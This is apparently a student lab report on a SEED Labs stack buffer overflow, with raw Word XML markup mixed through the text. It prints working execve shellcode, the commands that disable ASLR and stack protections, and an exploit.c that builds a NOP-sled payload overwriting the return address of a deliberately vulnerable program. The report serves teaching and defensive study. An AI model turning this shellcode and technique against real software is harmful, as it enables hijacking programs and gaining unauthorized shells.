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r2bows47v8z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SEED Labs – Buffer Overflow Attack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vzorj4uqfmd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Lab Report: Stack-Based Buffer Overflow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5e6qoutv6d2l" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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Buffer overflow is a class of memory corruption vulnerabilities that arises when a program writes more data to a buffer (a contiguous block of memory) than it can hold. In low-level languages like C, which lack built-in bounds checking, such vulnerabilities can be easily introduced through functions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strcpy()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scanf()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without proper input validation.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experiment aims to demonstrate how a buffer overflow vulnerability can be exploited to alter a program's control flow, ultimately executing arbitrary code supplied by an attacker. The process involves deliberately overflowing a local buffer in the stack and overwriting the function's return address to redirect execution to attacker-injected shellcode.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i2kmqxw3z6k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primary objective of this lab is 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Understand how buffer overflows work at the machine and memory level.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the layout of a function's stack frame, including the location of the return address.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Craft malicious input (commonly referred to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badfile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that overflows the buffer and overwrites the return address.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Inject and execute shellcode that spawns a shell, simulating unauthorized access.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Observe the behavior of various security countermeasures, such as ASLR, stack canaries, and non-executable stacks.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6mgjexwk1vfq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Prerequisites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experiment assumes prior understanding of the following concepts and tools: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Programming Language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vulnerable code is written in C. Understanding how memory is managed during function calls is essential.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Process Memory Layout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Familiarity with the structure of the stack, heap, data, and text segments in memory.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Assembly and Shellcode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Basic knowledge of x86 assembly is required to understand how shellcode is constructed and executed.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Linux Command-Line Environment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The lab is conducted in a Linux environment, utilizing tools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gcc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gdb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Python.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GDB (GNU Debugger)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Used to analyze stack layout, identify memory addresses, and assist in exploit development.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fo7ur0b39d8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Motivation and Use Case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Buffer overflow attacks represent a critical class of software vulnerabilities that have historically enabled some of the most serious security breaches. Despite modern countermeasures, buffer overflows remain relevant—particularly in embedded systems, legacy code, and Capture-The-Flag (CTF) competitions.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Understanding buffer overflows provides foundational insight into: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Exploit development and reverse engineering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testing and vulnerability assessment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hardening through the application of defense mechanisms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real-world implications of insecure programming practices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practical application demonstrated in this lab simulates an attack scenario in which user-controlled input is used to hijack program execution and spawn a shell with elevated privileges. This reflects a common goal in exploit development: gaining unauthorized control over a target system.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y1nhom7fzju" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Setup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are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SEEDUbuntu 16.04 VM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cmzfyq2pl1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Disable Security Protections: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Disable ASLR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sysctl -w kernel.randomize_va_space=0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Compile the vulnerable program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stack.c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with protections disabled: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gcc -fno-stack-protector -z execstack -o stack stack.c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erljc6t1vee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Understanding the Vulnerable Code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stack.c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bof(char *str) {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buffer[BUF_SIZE];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strcpy(buffer, str);  // No bounds checking!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1;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BUF_SIZE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defined as 24 bytes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strcpy()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unsafe — it will copy all bytes from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even if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longer than 24 bytes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Any data after 24 bytes will overwrite adjacent stack memory, including the return address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jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_42cl8z3ivk6f" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack Layout Analysis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During function execution, the stack looks like this (from higher to lower address):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71975" cy="3228975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289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want to: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the buffer (24 bytes)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Overwrite EBP (4 bytes, can be junk)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Overwrite return address (4 bytes) → with address of shellcode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Hence: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offset to return address = 24 (buffer) + 4 (EBP) = 28 bytes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09f7661x7vt" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode.c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char code[] =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"\x31\xc0\x50\x68\x2f\x2f\x73\x68"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"\x68\x2f\x62\x69\x6e\x89\xe3\x50"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"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";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Linux x86 assembly shellcode that invokes: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execve("/bin//sh", NULL, NULL);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launches a shell when executed.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test the shellcode works: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gcc -z execstack -fno-stack-protector -o shellcode shellcode.c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./shellcode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If successful, it spawns a shell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ok2zc3gbk9y" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crafting the Exploit (exploit.c)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the buffer with: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NOP sled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bytes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0x90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allow sliding into the shellcode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Shellcode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appended somewhere toward the end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Return address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somewhere pointing into the NOP sled</w:t>
        <w:br w:type="textWrapping"/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9c1dw44xyca" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Updated exploit.c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F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50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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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char shellcode[] =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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"\x31\xc0\x50\x68\x2f\x2f\x73\x68"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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"\x68\x2f\x62\x69\x6e\x89\xe3\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055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"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056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main(int argc, char **argv) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058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buffer[517];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059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 *badfile;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A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Step 1: Fill with NOPs (0x90)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C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memset(&amp;buffer, 0x90, 517);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D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Step 2: Copy shellcode to the end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F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shellcode_start = 517 - strlen(shellcode);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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memcpy(buffer + shellcode_start, shellcode, strlen(shellcode));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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Step 3: Find the return address (using GDB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063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we found: 0xbffff260</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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long *ret;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065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 = (long *)(buffer + 28); // Offset to return address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066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*ret = 0xbffff260;           // Must point into our NOP sled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067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Step 4: Save buffer to badfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069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badfile = fopen("./badfile", "w");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A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fwrite(buffer, 517, 1, badfile);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B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fclose(badfile);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="18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Rule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a3es7ywlrko3" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding the Correct Return Address (Using GDB)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 and load in gdb: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a breakpoint at bof and run with test input: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 the address of the str argument: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found: 0xbffff260, where the buffer (str) is stored. Using that as return address (must point into NOP sled or shellcode).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o7x4clliyfyy" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executing the Exploit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 everything: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gcc -fno-stack-protector -z execstack -o stack stack.c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gcc -o exploit exploit.c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badfile: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./exploit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the vulnerable program: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./stack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jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b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